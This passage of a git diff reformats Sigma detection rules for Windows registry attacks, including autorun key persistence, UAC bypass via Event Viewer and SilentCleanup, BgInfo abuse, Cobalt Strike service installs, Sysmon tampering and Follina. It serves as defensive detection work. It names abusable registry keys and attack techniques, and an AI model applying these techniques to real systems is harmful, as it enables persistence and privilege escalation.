Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -40,8 +39,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml index 1428fa66d..d927b40d7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml @@ -1,16 +1,15 @@ title: WinSock2 Autorun Keys Modification id: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: derived + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: derived status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -30,19 +29,17 @@ detection: - \Protocol_Catalog9\Catalog_Entries - \NameSpace_Catalog5\Catalog_Entries filter: - - NewValue: (Empty) - - ProcessName: C:\Windows\System32\MsiExec.exe - - ProcessName: C:\Windows\syswow64\MsiExec.exe - condition: registry_set and (winsock_parameters_base and winsock_parameters and - not filter) + - NewValue: (Empty) + - ProcessName: C:\Windows\System32\MsiExec.exe + - ProcessName: C:\Windows\syswow64\MsiExec.exe + condition: registry_set and (winsock_parameters_base and winsock_parameters and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index b2f4a2826..3f6205347 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -1,17 +1,16 @@ title: Wow6432Node CurrentVersion Autorun Keys Modification id: b29aed60-ebd1-442b-9cb5-16a1d0324adb related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -54,12 +53,12 @@ detection: - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe ObjectName|contains: \Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ filter_dropbox: - - NewValue|endswith: -A251-47B7-93E1-CDD82E34AF8B} - - NewValue: grpconv -o - - NewValue|contains|all: - - C:\Program Files - - \Dropbox\Client\Dropbox.exe - - ' /systemstartup' + - NewValue|endswith: -A251-47B7-93E1-CDD82E34AF8B} + - NewValue: grpconv -o + - NewValue|contains|all: + - C:\Program Files + - \Dropbox\Client\Dropbox.exe + - ' /systemstartup' filter_evernote: ObjectName|endswith: \Explorer\Browser Helper Objects\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\NoExplorer filter_dotnet: @@ -85,25 +84,24 @@ detection: - C:\Windows\Temp\ ProcessName|contains: - \winsdksetup.exe - - \windowsdesktop-runtime- - - \AspNetCoreSharedFrameworkBundle- + - \windowsdesktop-runtime- # C:\WINDOWS\Temp\{751E2E78-46DC-4376-9205-99219CDC34AE}\.be\windowsdesktop-runtime-6.0.12-win-x86.exe + - \AspNetCoreSharedFrameworkBundle- # "C:\ProgramData\Package Cache\{b52191c1-a9c0-4b34-9a4e-930c2dd8a540}\AspNetCoreSharedFrameworkBundle-x86.exe" /burn.runonce NewValue|endswith: ' /burn.runonce' filter_uninstallers: + # This image path is linked with different uninstallers when running as admin unfortunately ProcessName|startswith: C:\Windows\Installer\MSI ObjectName|contains: \Explorer\Browser Helper Objects filter_msiexec: ProcessName: C:\WINDOWS\system32\msiexec.exe ObjectName|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ - condition: registry_set and (all of selection_wow_current_version_* and not 1 - of filter_*) + condition: registry_set and (all of selection_wow_current_version_* and not 1 of filter_*) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml index 8c9440dc6..ae42799b3 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml @@ -1,16 +1,15 @@ title: Wow6432Node Classes Autorun Keys Modification id: 18f2065c-d36c-464a-a748-bcf909acb2e3 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -48,8 +47,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml index 9f56b97bb..bc15836c0 100644 --- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml +++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml @@ -1,16 +1,15 @@ title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification id: 480421f9-417f-4d3b-9552-fd2728443ec8 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -33,18 +32,15 @@ detection: filter: NewValue: - (Empty) - - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options - condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version - and not filter) + - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options + condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml index 796d9db38..100f23bf1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml @@ -1,9 +1,7 @@ title: New BgInfo.EXE Custom DB Path Registry Configuration id: 53330955-dc52-487f-a3a2-da24dcff99b5 status: experimental -description: Detects setting of a new registry database value related to BgInfo configuration. - Attackers can for example set this value to save the results of the commands executed - by BgInfo in order to exfiltrate information. +description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +17,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: \Software\Winternals\BGInfo\Database condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml index d08b11026..46d4d6109 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml @@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom VBScript Registry Configuration id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 related: - - id: cd277474-5c52-4423-a52b-ac2d7969902f - type: similar + - id: cd277474-5c52-4423-a52b-ac2d7969902f + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom VBScript via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \Software\Winternals\BGInfo\UserFields\ NewValue|startswith: '4' condition: registry_set and selection diff --git a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml index 35f5b36cf..e96e5e434 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml @@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom WMI Query Registry Configuration id: cd277474-5c52-4423-a52b-ac2d7969902f related: - - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 - type: similar + - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom WMI query via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \Software\Winternals\BGInfo\UserFields\ NewValue|startswith: '6' condition: registry_set and selection diff --git a/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml b/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml index a30ba820b..84a213f14 100644 --- a/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml +++ b/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml @@ -1,8 +1,7 @@ title: Blackbyte Ransomware Registry id: 83314318-052a-4c90-a1ad-660ece38d276 status: test -description: BlackByte set three different registry values to escalate privileges - and begin setting the stage for lateral movement and encryption +description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption references: - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ diff --git a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml index b33e6f806..c9ec03071 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml @@ -1,8 +1,7 @@ title: Bypass UAC Using Event Viewer id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af status: experimental -description: Bypasses User Account Control using Event Viewer and a relevant Windows - Registry modification +description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd diff --git a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml index aecf40c6f..e1d10e58c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml @@ -1,9 +1,7 @@ title: Bypass UAC Using SilentCleanup Task id: 724ea201-6514-4f38-9739-e5973c34f49a status: test -description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe - This can be abused to elevate any file with Administrator privileges without prompting - UAC +description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml b/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml index 16f1e155f..beb56a9a5 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml @@ -1,15 +1,10 @@ title: Changing RDP Port to Non Standard Number id: 509e84b9-a71a-40e0-834f-05470369bd1e status: test -description: 'Remote desktop is a common feature in operating systems. - - It allows a user to log into an interactive session with a system desktop graphical - user interface on a remote system. - - Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as - Remote Desktop Services (RDS). - - ' +description: | + Remote desktop is a common feature in operating systems. + It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. + Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml b/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml index 7e267407d..bd3838189 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml @@ -1,8 +1,8 @@ title: IE Change Domain Zone id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 related: - - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 - type: derived + - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 + type: derived status: experimental description: Hides the file extension through modification of the registry references: @@ -25,8 +25,8 @@ detection: ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ filter: NewValue: - - DWORD (0x00000000) - - DWORD (0x00000001) + - DWORD (0x00000000) # My Computer + - DWORD (0x00000001) # Local Intranet Zone - (Empty) condition: registry_set and (selection_domains and not filter) falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml b/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml index 6a51289f6..125b4552f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml @@ -1,9 +1,7 @@ title: Disable Sysmon Event Logging Via Registry id: 4916a35e-bfc4-47d0-8e25-a003d7067061 status: experimental -description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured - to load at an altitude of another registered service, it will fail to load at - boot. +description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. references: - https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650 - https://youtu.be/zSihR3lTf7g diff --git a/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml index f752568ad..dd230c21f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml @@ -1,8 +1,7 @@ title: Change Winevt Event Access Permission Via Registry id: 7d9263bd-dc47-4a58-bc92-5474abab390c status: experimental -description: Detects tampering with the "ChannelAccess" registry key in order to change - access to Windows event channel +description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel references: - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ @@ -24,9 +23,9 @@ detection: ObjectName|startswith: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\ ObjectName|endswith: \ChannelAccess NewValue|contains: - - (A;;0x1;;;SY) - - (A;;0x5;;;BA) - - (A;;0x1;;;LA) + - (A;;0x1;;;SY) # Local System having GENERIC ALL + - (A;;0x5;;;BA) # Built-in administrators having GENERIC ALL and GENERIC WRITE + - (A;;0x1;;;LA) # Local administrator having GENERIC ALL filter_trustedinstaller: ProcessName: C:\Windows\servicing\TrustedInstaller.exe filter_ti_worker: diff --git a/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml b/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml index f24d09123..4c99663bf 100644 --- a/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml +++ b/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml @@ -1,8 +1,7 @@ title: ClickOnce Trust Prompt Tampering id: ac9159cc-c364-4304-8f0a-d63fc1a0aabb status: experimental -description: Detects changes to the ClickOnce trust prompt registry key in order to - enable an installation from different locations such as the Internet. +description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 - https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior diff --git a/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml b/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml index a166edbd5..ae44eaf9b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml +++ b/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml @@ -1,16 +1,10 @@ title: CobaltStrike Service Installations in Registry id: 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 status: test -description: 'Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement. - +description: | + Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. We can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml) - - In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services - or HKLM\System\ControlSet002\Services, however, this rule is based on a regular - sysmon''s events. - - ' + In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon's events. references: - https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395 author: Wojciech Lesicki diff --git a/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml b/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml index f254f56b4..d47698d87 100644 --- a/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml +++ b/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml @@ -1,11 +1,10 @@ title: Service Binary in Suspicious Folder id: a07f0359-4c90-4dc4-a681-8ffea40b4f47 related: - - id: c0abc838-36b0-47c9-b3b3-a90c39455382 - type: obsoletes + - id: c0abc838-36b0-47c9-b3b3-a90c39455382 + type: obsoletes status: experimental -description: Detect the creation of a service with a service binary located in a suspicious - directory +description: Detect the creation of a service with a service binary located in a suspicious directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems), frack113 @@ -30,9 +29,10 @@ detection: - \ADMIN$\ - \Temp\ NewValue: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: ObjectName|startswith: \REGISTRY\MACHINE\System\CurrentControlSet\Services\ ObjectName|endswith: \ImagePath @@ -42,7 +42,7 @@ detection: - \ADMIN$\ - \Temp\ filter_1: - ProcessName|contains|all: + ProcessName|contains|all: # Filter FP with Avast software - \Common Files\ - \Temp\ condition: registry_set and (1 of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml b/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml index 12b17b8eb..fa47673dc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml +++ b/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml @@ -1,8 +1,7 @@ title: Service Binary in Uncommon Folder id: 277dc340-0540-42e7-8efb-5ff460045e07 status: experimental -description: Detect the creation of a service with a service binary located in a uncommon - directory +description: Detect the creation of a service with a service binary located in a uncommon directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems) @@ -25,9 +24,10 @@ detection: - \AppData\Local\ - \AppData\Roaming\ NewValue: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: ObjectName|startswith: \REGISTRY\MACHINE\System\CurrentControlSet\Services\ ObjectName|endswith: \ImagePath @@ -35,12 +35,12 @@ detection: - \AppData\Local\ - \AppData\Roaming\ filter: - - ProcessName|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom - - NewValue|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom + - ProcessName|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom + - NewValue|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom condition: registry_set and (1 of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml b/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml index 9bc2fe8e3..33a1ae1fe 100644 --- a/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml +++ b/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml @@ -1,8 +1,7 @@ title: Suspicious New Printer Ports in Registry (CVE-2020-1048) id: 7ec912f2-5175-4868-b811-ec13ad0f8567 status: test -description: Detects a new and suspicious printer port creation in Registry that could - be an attempt to exploit CVE-2020-1048 +description: Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048 references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth (Nextron Systems), NVISO diff --git a/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml b/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml index b78df5825..5a59d82ed 100644 --- a/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml +++ b/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml @@ -1,8 +1,7 @@ title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) id: 2d9403d5-7927-46b7-8216-37ab7c9ec5e3 status: test -description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could - be an attempt to exploit CVE-2022-30190. +description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ diff --git a/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml index 5840a8924..11c033c96 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml @@ -1,9 +1,7 @@ title: Potential Registry Persistence Attempt Via DbgManagedDebugger id: 9827ae57-3802-418f-994b-d5ecf5cd974b status: experimental -description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" - key in order to achieve persistence. Which will get invoked when an application - crashes +description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes references: - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ - https://github.com/last-byte/PersistenceSniper @@ -23,11 +21,9 @@ detection: selection: ObjectName|endswith: \Microsoft\.NETFramework\DbgManagedDebugger filter: - NewValue: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT - "%s" EVTHDL %d' + NewValue: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml b/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml index a82d8178b..037fa2f67 100644 --- a/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml +++ b/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml @@ -1,8 +1,8 @@ title: Windows Defender Exclusions Added - Registry id: a982fc9c-6333-4ffb-a51d-addb04e8b529 related: - - id: 